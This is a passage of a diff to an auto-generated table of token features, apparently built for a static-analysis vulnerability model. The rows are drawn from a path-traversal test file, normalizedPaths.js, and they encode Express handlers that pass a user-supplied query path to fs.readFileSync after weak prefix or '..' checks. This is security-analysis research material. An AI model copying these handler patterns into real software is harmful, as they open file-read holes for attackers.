autogenerated/TaintedPath/normalizedPaths.js:142:21:142:24 | path | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/normalizedPaths.js:142:21:142:24 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:142:21:142:24 | path | calleeImports | fs | @@ -8320,6 +73259,31 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:142:21:142:24 | path | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:142:21:142:24 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:142:21:142:24 | path | receiverName | fs | +| autogenerated/TaintedPath/normalizedPaths.js:144:5:144:6 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:144:5:144:6 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:144:5:144:6 | fs | enclosingFunctionBody | req res path pathModule join /home/user/www req query path path startsWith /home/user/www fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:144:5:144:6 | fs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:144:5:144:6 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:144:5:144:19 | fs.readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:144:5:144:19 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:144:5:144:19 | fs.readFileSync | enclosingFunctionBody | req res path pathModule join /home/user/www req query path path startsWith /home/user/www fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:144:5:144:19 | fs.readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:144:5:144:19 | fs.readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:144:5:144:25 | exceptional return of fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:144:5:144:25 | exceptional return of fs.read ... c(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:144:5:144:25 | exceptional return of fs.read ... c(path) | enclosingFunctionBody | req res path pathModule join /home/user/www req query path path startsWith /home/user/www fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:144:5:144:25 | exceptional return of fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:144:5:144:25 | exceptional return of fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:144:5:144:25 | fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:144:5:144:25 | fs.read ... c(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:144:5:144:25 | fs.read ... c(path) | enclosingFunctionBody | req res path pathModule join /home/user/www req query path path startsWith /home/user/www fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:144:5:144:25 | fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:144:5:144:25 | fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:144:8:144:19 | readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:144:8:144:19 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:144:8:144:19 | readFileSync | enclosingFunctionBody | req res path pathModule join /home/user/www req query path path startsWith /home/user/www fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:144:8:144:19 | readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:144:8:144:19 | readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:144:21:144:24 | path | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/normalizedPaths.js:144:21:144:24 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:144:21:144:24 | path | calleeImports | fs | @@ -8329,6 +73293,21 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:144:21:144:24 | path | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:144:21:144:24 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:144:21:144:24 | path | receiverName | fs | +| autogenerated/TaintedPath/normalizedPaths.js:147:1:147:3 | app | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:147:1:147:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:147:1:147:3 | app | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:147:1:147:7 | app.get | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:147:1:147:7 | app.get | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:147:1:147:7 | app.get | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:147:1:157:2 | app.get ... / OK\\n}) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:147:1:157:2 | app.get ... / OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:147:1:157:2 | app.get ... / OK\\n}) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:147:1:157:2 | exceptional return of app.get ... / OK\\n}) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:147:1:157:2 | exceptional return of app.get ... / OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:147:1:157:2 | exceptional return of app.get ... / OK\\n}) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:147:5:147:7 | get | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:147:5:147:7 | get | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:147:5:147:7 | get | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:147:9:147:37 | '/conca ... zation' | CalleeFlexibleAccessPath | app.get | | autogenerated/TaintedPath/normalizedPaths.js:147:9:147:37 | '/conca ... zation' | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:147:9:147:37 | '/conca ... zation' | calleeImports | express | @@ -8336,6 +73315,21 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:147:9:147:37 | '/conca ... zation' | contextSurroundingFunctionParameters | | | autogenerated/TaintedPath/normalizedPaths.js:147:9:147:37 | '/conca ... zation' | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:147:9:147:37 | '/conca ... zation' | receiverName | app | +| autogenerated/TaintedPath/normalizedPaths.js:147:40:147:39 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:147:40:147:39 | fs | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:147:40:147:39 | fs | enclosingFunctionBody | req res path foo/ pathModule normalize req query path path startsWith .. fs readFileSync path fs readFileSync path path includes .. fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:147:40:147:39 | fs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:147:40:147:39 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:147:40:147:39 | pathModule | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:147:40:147:39 | pathModule | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:147:40:147:39 | pathModule | enclosingFunctionBody | req res path foo/ pathModule normalize req query path path startsWith .. fs readFileSync path fs readFileSync path path includes .. fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:147:40:147:39 | pathModule | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:147:40:147:39 | pathModule | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:147:40:157:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:147:40:157:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:147:40:157:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res path foo/ pathModule normalize req query path path startsWith .. fs readFileSync path fs readFileSync path path includes .. fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:147:40:157:1 | 'arguments' object of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:147:40:157:1 | 'arguments' object of anonymous function | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:147:40:157:1 | (req, r ... // OK\\n} | CalleeFlexibleAccessPath | app.get | | autogenerated/TaintedPath/normalizedPaths.js:147:40:157:1 | (req, r ... // OK\\n} | InputArgumentIndex | 1 | | autogenerated/TaintedPath/normalizedPaths.js:147:40:157:1 | (req, r ... // OK\\n} | calleeImports | express | @@ -8343,11 +73337,93 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:147:40:157:1 | (req, r ... // OK\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/TaintedPath/normalizedPaths.js:147:40:157:1 | (req, r ... // OK\\n} | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:147:40:157:1 | (req, r ... // OK\\n} | receiverName | app | +| autogenerated/TaintedPath/normalizedPaths.js:147:40:157:1 | exceptional return of anonymous function | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:147:40:157:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:147:40:157:1 | exceptional return of anonymous function | enclosingFunctionBody | req res path foo/ pathModule normalize req query path path startsWith .. fs readFileSync path fs readFileSync path path includes .. fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:147:40:157:1 | exceptional return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:147:40:157:1 | exceptional return of anonymous function | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:147:40:157:1 | return of anonymous function | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:147:40:157:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:147:40:157:1 | return of anonymous function | enclosingFunctionBody | req res path foo/ pathModule normalize req query path path startsWith .. fs readFileSync path fs readFileSync path path includes .. fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:147:40:157:1 | return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:147:40:157:1 | return of anonymous function | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:147:41:147:43 | req | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:147:41:147:43 | req | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:147:41:147:43 | req | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:147:41:147:43 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:147:41:147:43 | req | enclosingFunctionBody | req res path foo/ pathModule normalize req query path path startsWith .. fs readFileSync path fs readFileSync path path includes .. fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:147:41:147:43 | req | enclosingFunctionBody | req res path foo/ pathModule normalize req query path path startsWith .. fs readFileSync path fs readFileSync path path includes .. fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:147:41:147:43 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:147:41:147:43 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:147:41:147:43 | req | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:147:41:147:43 | req | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:147:46:147:48 | res | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:147:46:147:48 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:147:46:147:48 | res | enclosingFunctionBody | req res path foo/ pathModule normalize req query path path startsWith .. fs readFileSync path fs readFileSync path path includes .. fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:147:46:147:48 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:147:46:147:48 | res | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:148:7:148:10 | path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:148:7:148:10 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:148:7:148:10 | path | enclosingFunctionBody | req res path foo/ pathModule normalize req query path path startsWith .. fs readFileSync path fs readFileSync path path includes .. fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:148:7:148:10 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:148:7:148:10 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:148:7:148:58 | path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:148:7:148:58 | path | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:148:7:148:58 | path | enclosingFunctionBody | req res path foo/ pathModule normalize req query path path startsWith .. fs readFileSync path fs readFileSync path path includes .. fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:148:7:148:58 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:148:7:148:58 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:148:7:148:58 | path = ... y.path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:148:7:148:58 | path = ... y.path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:148:7:148:58 | path = ... y.path) | enclosingFunctionBody | req res path foo/ pathModule normalize req query path path startsWith .. fs readFileSync path fs readFileSync path path includes .. fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:148:7:148:58 | path = ... y.path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:148:7:148:58 | path = ... y.path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:148:14:148:19 | 'foo/' | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:148:14:148:19 | 'foo/' | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:148:14:148:19 | 'foo/' | enclosingFunctionBody | req res path foo/ pathModule normalize req query path path startsWith .. fs readFileSync path fs readFileSync path path includes .. fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:148:14:148:19 | 'foo/' | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:148:14:148:19 | 'foo/' | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:148:14:148:19 | 'foo/' | stringConcatenatedWith | -endpoint- pathModule.normalize() | | autogenerated/TaintedPath/normalizedPaths.js:148:14:148:58 | 'foo/' ... y.path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | | autogenerated/TaintedPath/normalizedPaths.js:148:14:148:58 | 'foo/' ... y.path) | contextSurroundingFunctionParameters | (req, res) | | autogenerated/TaintedPath/normalizedPaths.js:148:14:148:58 | 'foo/' ... y.path) | enclosingFunctionBody | req res path foo/ pathModule normalize req query path path startsWith .. fs readFileSync path fs readFileSync path path includes .. fs readFileSync path | | autogenerated/TaintedPath/normalizedPaths.js:148:14:148:58 | 'foo/' ... y.path) | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:148:14:148:58 | 'foo/' ... y.path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:148:23:148:32 | pathModule | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:148:23:148:32 | pathModule | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:148:23:148:32 | pathModule | enclosingFunctionBody | req res path foo/ pathModule normalize req query path path startsWith .. fs readFileSync path fs readFileSync path path includes .. fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:148:23:148:32 | pathModule | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:148:23:148:32 | pathModule | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:148:23:148:42 | pathModule.normalize | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:148:23:148:42 | pathModule.normalize | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:148:23:148:42 | pathModule.normalize | enclosingFunctionBody | req res path foo/ pathModule normalize req query path path startsWith .. fs readFileSync path fs readFileSync path path includes .. fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:148:23:148:42 | pathModule.normalize | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:148:23:148:42 | pathModule.normalize | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:148:23:148:58 | exceptional return of pathMod ... y.path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:148:23:148:58 | exceptional return of pathMod ... y.path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:148:23:148:58 | exceptional return of pathMod ... y.path) | enclosingFunctionBody | req res path foo/ pathModule normalize req query path path startsWith .. fs readFileSync path fs readFileSync path path includes .. fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:148:23:148:58 | exceptional return of pathMod ... y.path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:148:23:148:58 | exceptional return of pathMod ... y.path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:148:23:148:58 | pathMod ... y.path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:148:23:148:58 | pathMod ... y.path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:148:23:148:58 | pathMod ... y.path) | enclosingFunctionBody | req res path foo/ pathModule normalize req query path path startsWith .. fs readFileSync path fs readFileSync path path includes .. fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:148:23:148:58 | pathMod ... y.path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:148:23:148:58 | pathMod ... y.path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:148:23:148:58 | pathMod ... y.path) | stringConcatenatedWith | 'foo/' -endpoint- | +| autogenerated/TaintedPath/normalizedPaths.js:148:34:148:42 | normalize | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:148:34:148:42 | normalize | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:148:34:148:42 | normalize | enclosingFunctionBody | req res path foo/ pathModule normalize req query path path startsWith .. fs readFileSync path fs readFileSync path path includes .. fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:148:34:148:42 | normalize | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:148:34:148:42 | normalize | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:148:44:148:46 | req | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:148:44:148:46 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:148:44:148:46 | req | enclosingFunctionBody | req res path foo/ pathModule normalize req query path path startsWith .. fs readFileSync path fs readFileSync path path includes .. fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:148:44:148:46 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:148:44:148:46 | req | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:148:44:148:52 | req.query | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:148:44:148:52 | req.query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:148:44:148:52 | req.query | enclosingFunctionBody | req res path foo/ pathModule normalize req query path path startsWith .. fs readFileSync path fs readFileSync path path includes .. fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:148:44:148:52 | req.query | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:148:44:148:52 | req.query | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:148:44:148:57 | req.query.path | CalleeFlexibleAccessPath | pathModule.normalize | | autogenerated/TaintedPath/normalizedPaths.js:148:44:148:57 | req.query.path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:148:44:148:57 | req.query.path | calleeImports | path | @@ -8357,6 +73433,46 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:148:44:148:57 | req.query.path | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:148:44:148:57 | req.query.path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:148:44:148:57 | req.query.path | receiverName | pathModule | +| autogenerated/TaintedPath/normalizedPaths.js:148:48:148:52 | query | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:148:48:148:52 | query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:148:48:148:52 | query | enclosingFunctionBody | req res path foo/ pathModule normalize req query path path startsWith .. fs readFileSync path fs readFileSync path path includes .. fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:148:48:148:52 | query | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:148:48:148:52 | query | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:148:54:148:57 | path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:148:54:148:57 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:148:54:148:57 | path | enclosingFunctionBody | req res path foo/ pathModule normalize req query path path startsWith .. fs readFileSync path fs readFileSync path path includes .. fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:148:54:148:57 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:148:54:148:57 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:150:7:150:28 | !path.s ... h('..') | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:150:7:150:28 | !path.s ... h('..') | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:150:7:150:28 | !path.s ... h('..') | enclosingFunctionBody | req res path foo/ pathModule normalize req query path path startsWith .. fs readFileSync path fs readFileSync path path includes .. fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:150:7:150:28 | !path.s ... h('..') | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:150:7:150:28 | !path.s ... h('..') | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:150:8:150:11 | path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:150:8:150:11 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:150:8:150:11 | path | enclosingFunctionBody | req res path foo/ pathModule normalize req query path path startsWith .. fs readFileSync path fs readFileSync path path includes .. fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:150:8:150:11 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:150:8:150:11 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:150:8:150:22 | path.startsWith | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:150:8:150:22 | path.startsWith | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:150:8:150:22 | path.startsWith | enclosingFunctionBody | req res path foo/ pathModule normalize req query path path startsWith .. fs readFileSync path fs readFileSync path path includes .. fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:150:8:150:22 | path.startsWith | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:150:8:150:22 | path.startsWith | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:150:8:150:28 | exceptional return of path.st ... h('..') | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:150:8:150:28 | exceptional return of path.st ... h('..') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:150:8:150:28 | exceptional return of path.st ... h('..') | enclosingFunctionBody | req res path foo/ pathModule normalize req query path path startsWith .. fs readFileSync path fs readFileSync path path includes .. fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:150:8:150:28 | exceptional return of path.st ... h('..') | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:150:8:150:28 | exceptional return of path.st ... h('..') | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:150:8:150:28 | path.st ... h('..') | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:150:8:150:28 | path.st ... h('..') | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:150:8:150:28 | path.st ... h('..') | enclosingFunctionBody | req res path foo/ pathModule normalize req query path path startsWith .. fs readFileSync path fs readFileSync path path includes .. fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:150:8:150:28 | path.st ... h('..') | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:150:8:150:28 | path.st ... h('..') | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:150:13:150:22 | startsWith | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:150:13:150:22 | startsWith | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:150:13:150:22 | startsWith | enclosingFunctionBody | req res path foo/ pathModule normalize req query path path startsWith .. fs readFileSync path fs 